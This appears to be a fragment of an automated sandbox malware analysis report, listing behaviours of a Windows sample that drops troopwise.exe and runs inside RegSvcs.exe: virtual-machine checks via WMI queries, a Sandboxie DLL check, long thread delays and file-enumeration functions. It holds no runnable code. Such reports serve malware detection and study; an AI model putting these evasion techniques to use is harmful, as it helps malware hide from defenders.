                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeAPI/Special instruction interceptor: Address: FE2A84
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeAPI/Special instruction interceptor: Address: 1812A5C
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599510Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599404Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598402Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597637Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597400Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597296Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597161Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596920Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596810Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596483Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596369Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595604Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595059Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594720Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594426Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598780Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598450Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598341Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598194Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597686Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597452Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597342Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595589Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595483Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595191Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594930Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594807Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594668Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593797Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2301Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7545Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2311Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7542Jump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeAPI coverage: 4.5 %
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeAPI coverage: 4.8 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EE4696
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EEC9C7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEC93C FindFirstFileW,FindClose,0_2_00EEC93C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF200
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF35D
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEF65E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3A2B
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3D4E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEBF27
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B4696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_005B4696
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BC93C FindFirstFileW,FindClose,1_2_005BC93C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_005BC9C7
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005BF200
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005BF35D
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005BF65E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005B3A2B
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005B3D4E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005BBF27
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E84AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599510Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599404Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598402Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597637Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597400Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597296Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597161Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596920Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596810Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596483Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596369Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595604Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595059Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594720Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594426Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598780Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598450Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598341Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598194Jump to behavior
